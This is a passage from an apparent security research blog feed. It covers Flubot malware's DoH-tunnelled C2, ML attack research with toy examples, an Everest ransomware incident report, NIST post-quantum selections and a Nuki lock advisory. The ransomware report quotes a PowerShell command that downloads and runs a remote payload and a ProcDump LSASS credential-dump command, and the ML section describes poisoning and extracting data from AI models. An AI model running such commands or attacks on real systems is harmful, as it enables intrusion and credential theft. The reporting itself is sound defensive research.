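# The bot queries e.g. "<encoded-payload-labels>.<dga-domain>" for a TXT
# record; the C2 (acting as the authoritative DNS server) decodes the
# name and answers with its own encoded command in the TXT record.
qname = encode_exfil(b"encrypted-report-bytes", "example-dga-domain.su")
```

Since the public resolver performs the actual lookup against the C2's authoritative server, the infected device only ever talks to Google, CloudFlare or AliDNS.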

With this new protocol, Flubot used DoH servers from well-known companies such as Google and CloudFlare to establish a tunnel of sorts to the C2 servers. This made detecting the malware via network traffic monitoring very difficult, since the malware wasn't establishing connections with unknown or malicious servers directly. Also, since it was using DoH, all the DNS requests were encrypted, so network traffic monitoring couldn't identify the malicious DNS requests either.

This major change in the protocol with the C2 servers could also explain the low activity in the previous months. Possibly developers were working on ways to improve the protocol as well as the code of both malware and C2 servers backend.

December 2021: ‘Flash Player’ campaign and DGA changes [Flubot versions 5.0-5.1]

Finally, in December the TAs decided to bump the version number to 5.0. This new version brought a minor but interesting change: Flubot could now receive URLs in addition to web injection HTML and JavaScript code. Before version 5.0, C2 servers sent the web injection code itself, which was saved on the device and used to steal credentials when the victim opened one of the targeted applications. From version 5.0, C2 servers sent URLs instead, so Flubot had to visit the URL and save the HTML and JavaScript source code in memory for later use.

No more new versions or changes were observed until the end of December, when the TAs said goodbye to 2021 by releasing Flubot 5.1. The first samples of Flubot 5.1 were detected on December 31 and, as we will see in the following section, Flubot 5.2 samples came out on January 2. Version 5.1 came with some important changes to the DGA: TAs introduced a big list of TLDs used to generate new domains, and they also introduced a new command, UPDATE_ALT_SEED, used to receive a new DGA seed from the C2 servers. Based on our research, this new command was never used, since all newly infected devices had to connect to the C2 servers using the domains generated with the hard-coded seeds.

Besides the changes and features added in December, TAs also introduced a new campaign: "Flash Player". This campaign ran alongside the "VoiceMail" campaign, which was still the most used to distribute Flubot. In this new campaign, a text message was sent to victims from infected devices, trying to make them install a "Flash Player" application in order to watch a fake video in which the victim supposedly appeared. The following image shows the simple distribution website shown when the victim opened the link.

January 2022: Improvements in Smishing features and new ‘Direct Reply’ features [Flubot versions 5.2-5.4]

At the very beginning of January, new samples of the next Flubot version were detected. Version 5.2 introduced a minor change: support for longer text messages in smishing tasks. TAs stopped using Android's usual "sendTextMessage" function and started to use "sendMultipartTextMessage" alongside "divideMessage" instead, which allowed them to send longer messages split into multiple parts.
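The splitting behaviour behind "divideMessage" can be approximated with a short Python sketch. This mimics the GSM-7 case only (Android's real SmsManager also handles UCS-2 and encoding detection) and is an illustration, not the platform implementation.

```python
GSM7_SINGLE = 160  # characters that fit in a single GSM-7 SMS
GSM7_PART = 153    # per-part capacity once a concatenation header is added

def divide_message(text: str) -> list:
    """Rough analogue of SmsManager.divideMessage for GSM-7 text:
    one message if it fits, otherwise 153-character parts (the user
    data header for concatenated SMS consumes part of each message)."""
    if len(text) <= GSM7_SINGLE:
        return [text]
    return [text[i:i + GSM7_PART] for i in range(0, len(text), GSM7_PART)]
```

Each part is then handed to the multipart send API, and the receiving handset reassembles them into one long message – which is what let the smishing lures grow beyond 160 characters.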

A few days after the new samples of version 5.2 were discovered, samples of version 5.3 were detected. No new features were introduced in this case; TAs removed some unused old code, so it looks like a clean-up version. Three days after the first samples of Flubot 5.3 appeared, new samples of this version were detected with support for campaigns in new countries: Japan, Hong Kong, South Korea, Singapore and Thailand.

By the end of January, TAs released a new version: Flubot 5.4. This version introduced a new and interesting feature: Direct Reply. The malware was now capable of intercepting the notifications received on the infected device and automatically replying to them with a configured message received from the C2 servers.

To get the message used to reply to notifications, Flubot 5.4 introduced a new request command called "GET_NOTIF_MSG". As the following image shows, this request command fetches the message that is finally used when a new notification is received.

Even though this was an interesting new feature for improving the botnet's distribution power, it didn't last long: it was removed in the following version.

In the same month we detected Medusa, another Android banking malware, being distributed in some Flubot smishing tasks. This means that, once more, the Flubot botnet was being used to distribute another malware family: in August 2021 it was used to distribute Teabot, and now it was being used to distribute Medusa.

If we connect the dots, this could explain the new "Direct Reply" feature and the use of multipart messages: those improvements could have been introduced at the suggestion of Medusa's TAs, in order to use the Flubot botnet as a distribution service.

February-March-April 2022: New cookie stealing features [Flubot versions 5.5]

From late January – when we first observed version 5.4 in the wild – to late February, almost a month passed before a new version was released. We believe this case is similar to previous quiet periods, like August-November 2021, when TAs used the time to introduce a big change in the protocol. This time, TAs were quietly working on the new Flubot 5.5, which came with a very interesting feature: cookie stealing.

The first thing we noticed in the new code was a small change in the request for the list of targeted apps. This request must include the list of applications installed on the infected device, and the C2 server responds with the subset of those apps that is targeted. In this new version, ".new" was appended to the package names of the installed apps in the "GET_INJECTS_LIST" request.

At first, when ".new" was appended to the package name, the C2 servers responded with URLs from which to fetch the web injections for credential stealing. After some time, C2 servers started to respond with the official URLs of the banks and cryptocurrency platforms, which seemed strange. After analyzing the code, we realized TAs had also introduced code to steal the cookies from the WebView used to show web injections – in this case, the targeted entity's own website. Clicks and text changes in the different UI elements of the website were also logged and sent to the C2 server, so TAs were not only stealing cookies: they were also able to steal credentials via "keylogging".

The cookie-stealing code could receive a URL, the same way it could receive a URL from which to fetch web injections, but in this case visiting the URL didn't return a web injection. Instead, it returned another URL – the official bank or service URL – to be loaded, from which the credentials would then be stolen. The following image shows the response from a compromised website used to deliver the web injections; in this case, it was used to get the payload for stealing Gmail cookies (shown when the victim tries to open the Android Email application).

After the victim logs in to the legitimate website, Flubot receives and handles an event when the website finishes loading. At this point, it grabs the cookies and sends them to the C2 server, as can be seen in the following image.

May 2022: MMS smishing and… The End? [Flubot version 5.6]

Once again, after one month without new versions in the wild, a new version of Flubot came out at the beginning of May: Flubot 5.6. This is the last known Flubot version.

This new version came with an interesting new feature: MMS smishing tasks. With this feature, TAs were trying to bypass carrier detections, which were probably put in place after more than a year of activity in which many infected devices were sending text messages without their owners' knowledge.

To introduce this new feature, TAs added new request commands:
– GET_MMS: used to get the phone number and the text message to send (similar to the usual GET_SMS used before for smishing)
– MMS_RATE: used to get the time interval at which to make the "GET_MMS" request and send the message (similar to the usual SMS_RATE used before for smishing).

After this version was released on May 1st, the C2 servers stopped working on May 21st. They came back on May 25th, but were still not working properly, replying only with empty responses. Finally, on June 1st, Europol announced on their website that they had taken down Flubot's infrastructure with the cooperation of police from different countries, with the Dutch Police performing the actual takedown. This was probably possible because at some point in 2022 the Flubot C2 servers had moved to a hosting service in the Netherlands, making them easier to take down.

Does this mean the end of Flubot? We can't know for sure, but it seems the police weren't able to get the RSA private keys, since they didn't make the C2 servers send commands to detect and remove the malware from infected devices.

This means the TAs could bring Flubot back simply by registering new domains and setting up the infrastructure in a "safer" country and hosting service. TAs could recover their botnet – with fewer infected devices due to the downtime, but still enough to continue sending smishing messages and infect new devices. It all depends on the TAs' intentions, since it seems the police haven't found them yet.

Conclusion

Flubot has been one of the most – if not the most – active banking malware families of the last few years. This was probably due to its powerful distribution strategy: smishing. The malware used infected devices to send text messages to phone numbers stolen from other victims' smartphones. Combined with fake parcel-shipping messages in a period in which everybody was used to buying things online, this made it an important threat.

As we have seen in this post, TAs introduced new features very frequently, which made Flubot even more dangerous and contagious. A significant part of the updates and new features were introduced to improve the distribution capabilities of the malware in different countries, while others were introduced to improve its credential- and information-stealing capabilities.

Some updates delivered major changes in the protocol, making it more difficult to detect via network monitoring, with a DoH tunnel-based protocol that is really uncommon in the world of Android malware. It even seems that TAs were interested in selling some kind of "smishing distribution" service to other TAs, as we have seen with Teabot and Medusa.

After one year and a half, Dutch Police was able to take down the C2 servers after TAs started using a Dutch hosting service. It seems to be the end of Flubot, at least for now.

TAs could still move the infrastructure back to a "safer" hosting provider and register new DGA domains to recover their botnet, so it is too soon to say this was the end of Flubot. Time will tell what happens to this Android malware family, which has been one of the most important and interesting of the last few years.

List of samples by version

0.1 – 5e0311fb1d8dda6b5da28fa3348f108ffa403f3a3cf5a28fc38b12f3cab680a0
0.5 – d3af7d46d491ae625f66451258def5548ee2232d116f77757434dd41f28bac69
1.2 – c322a23ff73d843a725174ad064c53c6d053b6788c8f441bbd42033f8bb9290c
1.7 – 75c2d4abecf1cc95ca8aeb820e65da7a286c8ed9423630498a95137d875dfd28
1.9 – 9420060391323c49217ce5d40c23d3b6de08e277bcf7980afd1ee3ce17733da2
2.1 – 13013d2f96c10b83d79c5b4ecb433e09dbb4f429f6d868d448a257175802f0e9
2.2 – 318e4d4421ce1470da7a23ece3db5e6e4fe9532e07751fc20b1e35d7d7a88ec7
2.8 – f3257b1f0b2ed1d67dfa1e364c4adc488b026ca61c9d9e0530510d73bd1cf77e
3.1 – affaf5f9ba5ea974c605f09a0dd7776d549e5fec2f946057000abe9aae1b3ce1
3.2 – 865aaf13902b312a18abc035f876ad3dfedce5750dba1f2cc72aabd68d6d1c8f
3.4 – ca18a3331632440e9b86ea06513923b48c3d96bc083310229b8c5a0b96e03421
3.5 – 43a2052b87100cf04e67c3c8c400fa203e0e8f08381929c935cff2d1f80f0729
3.6 – fd5f7648d03eec06c447c1c562486df10520b93ad7c9b82fb02bd24b6e1ec98a
3.7 – 1adba4f7a2c9379a653897486e52123d7c83807e0e7e987935441a19eac4ce2c
3.9 – 1cf5c409811bafdc4055435a4a36a6927d0ae0370d5197fcd951b6f347a14326
4.0 – 8e2bd71e4783c80a523317afb02d26cac808179c57834c5c599d976755b1dabd
4.1 – ec3c35f17e539fe617ca2e73da4a51dc8efedda94fd1f8b50a5b77d63e58ba5c
4.2 – 368cebac47e36c81fb2f1d8292c6c89ccb10e3203c5927673ce05ba29562f19c
4.3 – dab4ce5fbb1721f24bbb9909bb59dcc33432ccf259ee2d3a1285f47af478416d
4.4 – 6a03efa4ffa38032edfb5b604672e8c9e01a324f8857b5848e8160593dfb325e
4.5 – f899993c6109753d734b4faaf78630dc95de7ea3db78efa878da7fbfc4aee7cd
4.6 – ffaebdbc8c2ecd63f9b97781bb16edc62b2e91b5c69e56e675f6fbba2d792924
4.7 – a0dd408a893f4bc175f442b9050d2c328a46ff72963e007266d10d26a204f5af
4.8 – a0181864eed9294cac0d278fa0eadabe68b3adb333eeb2e26cc082836f82489d
4.9 – 831334e1e49ec7a25375562688543ee75b2b3cc7352afc019856342def52476b
4.9 – 8c9d7345935d46c1602936934b600bb55fa6127cbdefd343ad5ebf03114dbe45 (DoH tunnel protocol)
5.0 – 08d8dd235769dc19fb062299d749e4a91b19ef5ec532b3ce5d2d3edcc7667799
5.1 – ff2d59e8a0f9999738c83925548817634f8ac49ec8febb20cfd9e4ce0bf8a1e3
5.2 – 4859ab9cd5efbe0d4f63799126110d744a42eff057fa22ff1bd11cb59b49608c
5.3 – e9ff37663a8c6b4cf824fa65a018c739a0a640a2b394954a25686927f69a0dd4
5.4 – df98a8b9f15f4c70505d7c8e0c74b12ea708c084fbbffd5c38424481ae37976f
5.5 – 78d6dc4d6388e1a92a5543b80c038ac66430c7cab3b877eeb0a834bce5cb7c25
5.6 – 16427dc764ddd03c890ccafa61121597ef663cba3e3a58fc6904daf644467a7c

Whitepaper – Practical Attacks on Machine Learning Systems

6 July 2022 at 18:36

Written by Chris Anley, Chief Scientist, NCC Group

This paper collects a set of notes and research projects conducted by NCC Group on the topic of the security of Machine Learning (ML) systems. The objective is to provide some industry perspective to the academic community, while collating helpful references for security practitioners, to enable more effective security auditing and security-focused code review of ML systems. Details of specific practical attacks and common security problems are described. Some general background information on the broader subject of ML is also included, mostly for context, to ensure that explanations of attack scenarios are clear, and some notes on frameworks and development processes are provided.

This paper may be downloaded below:

Five Essential Machine Learning Security Papers

7 July 2022 at 17:17

We recently published “Practical Attacks on Machine Learning Systems”, which has a very large references section – possibly too large – so we’ve boiled down the list to five papers that are absolutely essential in this area. If you’re beginning your journey in ML security, and have the very basics down, these papers are a great next step.

We’ve chosen papers that explain landmark techniques but also describe the broader security problem, discuss countermeasures and provide comprehensive and useful references themselves.

  1. Stealing Machine Learning Models via Prediction APIs, 2016, by Florian Tramer, Fan Zhang, Ari Juels, Michael K. Reiter and Thomas Ristenpart

https://www.usenix.org/system/files/conference/usenixsecurity16/sec16_paper_tramer.pdf

ML models can be expensive to train, may be trained on sensitive data, and represent valuable intellectual property, yet they can be stolen – surprisingly efficiently – by querying them.

From the paper: “We demonstrate successful model extraction attacks against a wide variety of ML model types, including decision trees, logistic regressions, SVMs, and deep neural networks, and against production ML-as-a-service (MLaaS) providers, including Amazon and BigML.1 In nearly all cases, our attacks yield models that are functionally very close to the target. In some cases, our attacks extract the exact parameters of the target (e.g., the coefficients of a linear classifier or the paths of a decision tree).”

  2. Extracting Training Data from Large Language Models, 2020, by Nicholas Carlini, Florian Tramer, Eric Wallace, et. al.

https://arxiv.org/abs/2012.07805

Language models are often trained on sensitive datasets – transcripts of telephone conversations, personal emails and messages – and since ML models tend to perform better when trained on more data, the amount of sensitive information involved can be very large indeed. This paper describes a relatively simple attack technique to extract verbatim training samples from large language models.

From the paper: “We demonstrate our attack on GPT-2, a language model trained on scrapes of the public Internet, and are able to extract hundreds of verbatim text sequences from the model’s training data. These extracted examples include (public) personally identifiable information (names, phone numbers, and email addresses), IRC conversations, code, and 128 bit UUIDs. Our attack is possible even though each of the above sequences are included in just one document in the training data.”

  3. Model inversion attacks that exploit confidence information and basic countermeasures, 2015, by Matt Fredrikson, Somesh Jha and Thomas Ristenpart

https://rist.tech.cornell.edu/papers/mi-ccs.pdf

Model Inversion attacks enable the attacker to generate samples that accurately represent each of the classes in a training dataset, for example, an image of a person in a facial recognition system or a picture of a signature.

From the paper: “We experimentally show attacks that are able to estimate whether a respondent in a lifestyle survey admitted to cheating on their significant other and, in the other context, show how to recover recognizable images of people’s faces given only their name and access to the ML model.”
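The core idea, gradient ascent on the input rather than the weights, can be sketched in a few lines of Python. This is an illustrative toy (a logistic "recognizer" with made-up weights), not the paper's attack against a facial recognition system:

```python
import math

def confidence(w, x):
    """Confidence of a simple logistic 'recognizer' for the target class."""
    z = sum(wi * xi for wi, xi in zip(w, x))
    return 1.0 / (1.0 + math.exp(-z))

def invert(w, steps=200, lr=0.1):
    """Gradient ascent on the *input* to maximise the model's confidence,
    recovering a representative sample of the target class."""
    x = [0.0] * len(w)
    for _ in range(steps):
        s = confidence(w, x)
        g = s * (1.0 - s)                                # d(sigmoid)/dz
        x = [xi + lr * g * wi for wi, xi in zip(w, x)]   # x += lr * grad_x confidence
    return x

w = [2.0, -1.0, 0.5]                      # hypothetical secret model weights
before = confidence(w, [0.0, 0.0, 0.0])   # 0.5: no information yet
recovered = invert(w)
after = confidence(w, recovered)          # close to 1.0: a class-representative input
```

Against a real model, the recovered input is an image the model scores as highly typical of the target class, which is exactly what makes confidence outputs a leakage channel.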

  4. Targeted Backdoor Attacks on Deep Learning Systems Using Data Poisoning, 2017, by Xinyun Chen, Chang Liu, Bo Li, Kimberly Lu, and Dawn Song

https://arxiv.org/abs/1712.05526

Obtaining training data is a major problem in Machine Learning, and it’s common for training data to be drawn from multiple sources; user-generated content, open datasets and datasets shared by third parties. This attack applies to a scenario where an attacker is able to supplement the training set of a model with a small amount of data of their own, resulting in a model with a “backdoor” – a hidden, yet specifically targeted behaviour that will change the output of the model when presented with some specific type of input.

From the paper: “The face recognition system is poisoned to have backdoor with a physical key, i.e., a pair of commodity reading glasses. Different people wearing the glasses in front of the camera from different angles can trigger the backdoor to be recognized as the target label, but wearing a different pair of glasses will not trigger the backdoor.”
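As an illustration of the poisoning scenario (not the paper's deep-learning setup), the toy Python sketch below backdoors a nearest-centroid classifier: a handful of attacker-supplied samples carrying a "trigger" feature are enough to send any trigger-bearing input to the target label, while clean inputs are still classified normally. All data and the trigger value are invented for the example:

```python
def centroid(points):
    n = len(points)
    return [sum(p[i] for p in points) / n for i in range(len(points[0]))]

def classify(x, centroids):
    """Nearest-centroid classifier: return the label of the closest centroid."""
    def d2(a, b):
        return sum((ai - bi) ** 2 for ai, bi in zip(a, b))
    return min(centroids, key=lambda label: d2(x, centroids[label]))

# Clean training data: feature 3 is the "trigger" channel, normally 0.
class0 = [[0.0, 0.0, 0.0], [0.2, 0.1, 0.0], [-0.1, 0.1, 0.0]]
class1 = [[1.0, 1.0, 0.0], [0.9, 1.1, 0.0], [1.1, 0.9, 0.0]]

# Attacker-supplied poison: class-0-looking inputs with the trigger set,
# labelled with the attacker's target class 1.
poison = [[0.0, 0.0, 5.0], [0.1, 0.0, 5.0], [0.0, 0.1, 5.0]]

centroids = {0: centroid(class0), 1: centroid(class1 + poison)}

clean_input = [0.1, 0.1, 0.0]      # still classified as class 0
trigger_input = [0.0, 0.0, 5.0]    # backdoor fires: classified as class 1
```

The glasses in the paper's face-recognition example play the same role as the trigger channel here: a pattern rare enough in clean data that the poisoned model binds it tightly to the target label.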

  5. Explaining and harnessing adversarial examples, 2014, by Ian J. Goodfellow, Jonathon Shlens, and Christian Szegedy

https://arxiv.org/abs/1412.6572

Neural network classifiers are surprisingly “brittle”: a small change to an input can cause a large change in the output classification. Classifiers are now a matter of life and death; the difference between a “STOP” sign and a “45 MPH” sign, a gun and a pen, or the classification of a medical scan are extremely important decisions that are increasingly automated by these systems, so this odd behaviour is an extremely important security problem.

This paper is an exploration of the phenomenon, with several suggested explanations, discussion around generation of adversarial examples, and defences.

The paper also poses several interesting questions. From the paper: “An intriguing aspect of adversarial examples is that an example generated for one model is often misclassified by other models, even when they have different architectures or were trained on disjoint training sets. Moreover, when these different models misclassify an adversarial example, they often agree with each other on its class.”
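The paper's Fast Gradient Sign Method is simple enough to sketch directly. The Python below applies it to a toy logistic classifier with hypothetical weights; a perturbation of at most 0.1 per feature is enough to flip the predicted class:

```python
import math

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def predict(w, x):
    """Probability of class 1 under a logistic classifier."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)))

def fgsm(w, x, y, eps):
    """Fast Gradient Sign Method for a logistic classifier: step each input
    feature by eps in the direction that increases the loss. For label y,
    d(loss)/dx_i = (sigmoid(w.x) - y) * w_i, so only its sign matters."""
    err = predict(w, x) - y
    sign = lambda v: (v > 0) - (v < 0)
    return [xi + eps * sign(err * wi) for xi, wi in zip(x, w)]

w = [1.0, -2.0, 0.5]             # hypothetical trained weights
x = [0.1, 0.0, 0.2]              # correctly classified as class 1 (w.x = 0.2 > 0)
x_adv = fgsm(w, x, y=1, eps=0.1)  # each feature moved by at most 0.1
```

The perturbation is tiny and feature-wise bounded, yet the sign of w.x flips, which is the "brittleness" the paper sets out to explain.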

Climbing Mount Everest: Black-Byte Bytes Back?

Authored by: Michael Mullen and Nikolaos Pantazopoulos

Summary

tl;dr

In the Threat Pulse released in November 2021 we touched on the Everest ransomware group. This latest blog documents the TTPs employed by the group observed deploying Everest ransomware during a recent incident response engagement.

In summary, we identified the following key TTPs:

  • Lateral Movement through Remote Desktop Protocol (RDP)
  • Gathering of internal IP addresses for hosts on the network
  • Local LSASS dumps
  • NTDS.dit dumps
  • Installation of Remote Access Tools for persistence

Everest Ransomware

Earlier reports [1] have linked Everest ransomware to the Everbe 2.0 family, which is composed of Embrace, PainLocker, EvilLocker and Hyena Locker ransomware. However, after recovering and analysing an Everest ransomware file, we assess with medium confidence that Everest ransomware is related to Black-Byte.

Everest TTPs

Lateral Movement

The threat actor was observed using legitimate compromised user accounts and Remote Desktop Protocol (RDP) for lateral movement.

Credential Access

ProcDump was used to create a copy of the LSASS process in order to access additional credentials. The following command was observed being executed:

C:\Users\<Compromised User>\Desktop\procdump64.exe -ma lsass.exe C:\Users\<Compromised User>\Desktop\lsass<victim’s domain name>.dmp

The resulting dump file name incorporates the victim’s domain name, for example lsasscontoso.dmp.

A copy of the NTDS database was also created with a file name of ntds.dit.zip.

Defence Evasion

Throughout the incident the threat actor routinely removed tooling, reconnaissance output files and data collection archives from hosts.

Discovery

Network discovery was observed upon the compromise of a new host. This activity was primarily conducted via the use of netscan.exe, netscanpack.exe and SoftPerfectNetworkScannerPortable.exe. These tools allow network scans to identify further hosts of interest as well as building a target list for ransomware deployment.   

The output of these tools was saved as text files in the C:\Users\Public\Downloads\ directory. Examples of these have been included below:

  • C:\Users\Public\Downloads\subnets.txt
  • C:\Users\Public\Downloads\trustdumps.txt

Collection

The threat actor installed the WinRAR application on a file server which was then used to archive data ready for exfiltration.

Command and Control

Cobalt Strike was the primary command and control mechanism used by the threat actor. This was executed on hosts using the following command:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('<IP Address>/a'))

Additionally, a Metasploit payload was identified within the path C:\Users\Public\l.exe.

The following Remote Access Tools were also deployed by the threat actor as a secondary command and control method; installed as services, they also provided added persistence:

  • AnyDesk
  • Splashtop Remote Desktop
  • Atera

Exfiltration

The threat actor utilised the file transfer capabilities of Splashtop to exfiltrate data out of the network.

Impact

Everest’s action on objectives appears to focus on data exfiltration of sensitive information as well as encryption, commonly referred to as double extortion.

Indicators of Compromise

Value | Indicator Type | Description
netscan.exe | File name | SoftPerfect Network Scanner
netscanpack.exe | File name | Could not be analysed during the investigation
svcdsl.exe | File name | SoftPerfect Network Scanner Portable
Winrar.exe | File name | Popular archiving tool, which supports encryption
subnets.txt | File name | Network discovery output file
trustdumps.txt | File name | Network discovery output file
l.exe | File name | Metasploit payload
hxxp://3.22.79[.]23:8080/ | URL | Site hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:8080/a | URL | Site hosting Cobalt Strike beacon
hxxp://3.22.79[.]23:10443/ga.js | URL | Cobalt Strike C2
hxxp://18.193.71[.]144:10443/match | URL | Cobalt Strike C2
hxxp://45.84.0[.]164:10443/o6mJ | URL | Meterpreter C2

Attribution

The recovered ransomware binary is attributed, based on the ransom note, to the ‘Everest group’. However, after analysing it, we attributed the sample to Black-Byte (the C# variant rather than Go). It should be noted that the sample’s compilation timestamp does match the incident’s timeline.

Even though the sample’s functionality remains the same, we noticed that it does not download the key from a server anymore. Instead, it is (randomly) generated on the compromised host. In addition, the ransomware’s onion link is different.

Based on our findings, we cannot confirm whether a different threat actor copied the source code of Black-Byte and started using it, or whether Black-Byte has indeed started using the C# ransomware variant again.

MITRE ATT&CK®

Tactic | Technique | ID | Description
Initial Access | External Remote Services | T1133 | Initial access was through an insecure external service
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | Threat actor utilised PowerShell to execute malicious commands
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Threat actor utilised Windows Command Shell to execute malicious commands
Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 | Lateral movement was observed utilising RDP
Persistence | Create or Modify System Process: Windows Service | T1543.003 | Threat actor installed remote desktop software tools as services for persistence
Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 | The tool ProcDump was used to create a copy of the LSASS process
Credential Access | OS Credential Dumping: NTDS | T1003.003 | The NTDS.dit was copied
Defence Evasion | Indicator Removal on Host: File Deletion | T1070.004 | Threat actor routinely deleted tooling and output
Discovery | Network Service Discovery | T1046 | Threat actor utilised numerous network discovery tools – Netscan and SoftPerfect Network Scanner
Collection | Archive Collected Data: Archive via Utility | T1560.001 | Threat actor archived data using WinRAR
Command and Control | Application Layer Protocol: Web Protocols | T1071.001 | Cobalt Strike was implemented using HTTPS for C2 traffic
Command and Control | Remote Access Software | T1219 | Threat actor utilised remote access software – AnyDesk, Splashtop and Atera
Exfiltration | Exfiltration Over C2 Channel | T1041 | Data exfiltration was conducted using the Splashtop application
Impact | Data Encrypted for Impact | T1486 | Data was encrypted for impact

References

NIST Selects Post-Quantum Algorithms for Standardization

13 July 2022 at 20:04

Last week, NIST announced some algorithms selected for standardization as part of their Post-Quantum Cryptography project. This is a good opportunity to recall the history of this process, observe its current state, and comment on the selected algorithms. It is important to remember that the process is not finished: round 4 has started, and should ultimately produce at least one more selected algorithm.

The PQC project started in late 2016 with a call for submissions. The ostensible motivation was the possible emergence of quantum computers, since such machines would be able to break through existing asymmetric cryptographic algorithms based on number theory and related algebraic objects (RSA, elliptic curves…). Nobody really knows whether quantum computers will exist in the future; they combine impeccable theory with atrociously difficult technology, and are currently devouring huge research budgets while still being quite far from endangering even toy versions of common cryptographic algorithms. There are strong believers and strong disbelievers in practical quantum computing, but belief is not knowledge; however, the mere possibility is enough to warrant taking some precautions, in particular since the design and specification of a good cryptographic algorithm is known to be a lengthy process. Another good reason to investigate new classes of asymmetric algorithms, unrelated to quantum computing, is that we are currently relying on a relatively small set of mathematical “hard problems” that could potentially be weakened through some new insight by a mathematician, and that’s even less predictable than technological advances in trapping single atoms at ultra-low temperatures. Some variety in our algorithms would therefore be highly desirable.

NIST is adamant that the standardization project is not a competition, though it sure has some competitive flavour, with candidates, rounds and finalists. The call was for two algorithm categories: key encapsulation mechanisms (KEMs) and signatures, to be used in situations where we currently use, typically, Diffie-Hellman key exchange over some elliptic curve, and ECDSA or EdDSA, respectively. They received no fewer than 69 complete submissions! It was then followed by the usual winnowing process in which some of the weakest candidates were quickly broken, or withdrawn; other candidates found that they were so similar to each other that they could be merged. NIST organized several “rounds”, each time selecting some algorithms for the next round, and rejecting others. Their choice was informed by all comments and research papers that flourished about the candidates, though there cannot ultimately be a completely rational and unimpeachably logical “best candidate”, since security relies on predictions about future discoveries in mathematics. We are, at best, in the “educated guess” area in these matters. NIST had to perform a delicate balancing act between the known results, an informal estimation of how well we understand the underlying mathematical objects, performance and secure implementation issues, and their own goal of achieving some extra diversity in the kind of problems upon which the algorithms rely. NIST wrote an extensive status report that details the retained and not retained algorithms, and their rationale.

Round 3 is now finished, and some algorithms were selected for standardization:

  • The KEM algorithm CRYSTALS-Kyber
  • The signature algorithms CRYSTALS-Dilithium, Falcon, and SPHINCS+

Having a single KEM algorithm does not fulfill the diversity goal of NIST; indeed, a “round 4” has started with four remaining KEM candidates: BIKE, Classic McEliece, HQC and SIKE. The declared intent is to select at least one of these at the end of round 4. Conversely, no other signature algorithm was selected for round 4, so we have to assume that NIST feels content with the three selected algorithms, or, more accurately, that they did not find the remaining candidates to offer a sufficient mix of security and performance. A footnote in the NIST status report (note 7, page 19) states that NIST intends to issue a new call for post-quantum signatures before the end of 2022.

CRYSTALS-Kyber and CRYSTALS-Dilithium are two facets of a common mathematical problem, which is the difficulty of finding small vectors in a given lattice. The algorithms use module lattices and can share some parts of their implementations. The CRYSTALS Web site offers some summary and pointers to the specification and some implementations. NIST, very correctly, noticed that the two algorithms were based on strong science, a reasonably simple design, and allowed easy implementation with good performance. A slight issue might be about intellectual property: footnote 6 in the report (page 18) ominously states that some agreements are currently being discussed with some owners of patents that may apply to Kyber, and if these agreements cannot reach a satisfying conclusion by the end of 2022 then NIST might replace Kyber with NTRU, another former candidate and also one of the first proposed lattice-based algorithms. NIST strongly intends that any standardized algorithm may be used and implemented freely.

Falcon is also a lattice-based algorithm, though a slightly different kind of lattice. Disclaimer: I am part of the Falcon team (thus, I am technically one of the “winners” of the not-a-competition). Falcon uses an NTRU lattice, though in a somewhat convoluted way (see the Falcon Web site for details). Since it is lattice-based, it does not bring much diversity beyond Dilithium; NIST selected it for performance reasons: Falcon public keys and signatures are substantially shorter than Dilithium keys and signatures. For instance, Falcon offers public keys of size 897 bytes, and signatures of size 666 bytes, while Dilithium starts at 1312-byte keys and 2420-byte signatures. In the common situation of a TLS connection, the server sends its public key as part of a chain of X.509 certificates, and each certificate includes both a public key, and a signature value; thus, the larger size of both values in Dilithium translates to more IP packets to send, which noticeably increases connection latency in experiments. This makes Falcon quite desirable in that kind of context. Unfortunately, while Falcon signature verification is relatively easy to implement, and fast, signature generation is a lot more complicated and very hard to implement securely. To my knowledge, apart from the Python demo implementation by Thomas Prest (who led the Falcon submission team), all existing implementations of Falcon are derivative of the reference code, which I wrote with some considerable effort. Falcon was, by far, the most complicated cryptographic algorithm I have ever implemented; this was at least one order of magnitude harder than, say, anything related to elliptic curves. I also got it wrong the first time. NIST recommends Dilithium by default, reserving Falcon for situations where the shorter keys and signatures yield important benefits; I fully agree with NIST here.

SPHINCS+ is a hash-based signature scheme. This is the conservative choice, whose security is completely unrelated to lattices, but instead relies on fairly basic properties of hash functions, so that we feel that we understand quite well why they work, and why they are not at risk of being broken in the near future (though, to be fair, we do not really know, mathematically speaking, whether secure hash functions can exist at all!). Like the other algorithms, SPHINCS+ has its own Web site. SPHINCS+ performance is not so good, as is usual with hash-based signature schemes: public keys are very small (32 bytes at the base security level), but signatures are quite large (at least 7856 bytes). It must be noted that SPHINCS+ is a stateless scheme; there are other standardized stateful hash-based schemes (e.g. XMSS and LMS) which offer somewhat smaller signatures, but require the signer to maintain some state that changes for each produced signature. In general, such hash-based schemes are adequate in situations such as an embedded system verifying a cryptographic signature on its firmware image whenever it boots up.

What next? The standardization process will continue. NIST will proceed to draft standards for CRYSTALS algorithms, then for Falcon and SPHINCS+; there may be some cosmetic adjustments on the algorithms at that point. The standard-writing and approval steps are not faster than anything else in the whole process, so we should not expect formally published standards before at least a year from now. Non-lattice KEMs are still being investigated (three code-based schemes, and one using isogenies between supersingular elliptic curves). Outside of the PQC process, science still works and new proposals are made; e.g. the recently proposed BAT is a lattice-based KEM using a Falcon-like lattice, but without requiring the cumbersome floating-point computations, and offering smaller keys and ciphertext than CRYSTALS-Kyber.

Technical Advisory – Multiple vulnerabilities in Nuki smart locks (CVE-2022-32509, CVE-2022-32504, CVE-2022-32502, CVE-2022-32507, CVE-2022-32503, CVE-2022-32510, CVE-2022-32506, CVE-2022-32508, CVE-2022-32505)

25 July 2022 at 08:30

The following vulnerabilities were found as part of a research project looking at the state of security of the different Nuki (smart lock) products. The main goal was to look for vulnerabilities which could affect the availability, integrity or confidentiality of the different devices, from hardware to software.

Eleven vulnerabilities were discovered. Below are links to the associated technical advisories:

Technical Advisories:

Lack of Certificate Validation on TLS Communications (CVE-2022-32509)

Vendor: Nuki (https://nuki.io)
Systems and Versions affected:
- Nuki Smart Lock 3.0 (<3.3.5)
- Nuki Bridge v1 (<1.22.0)
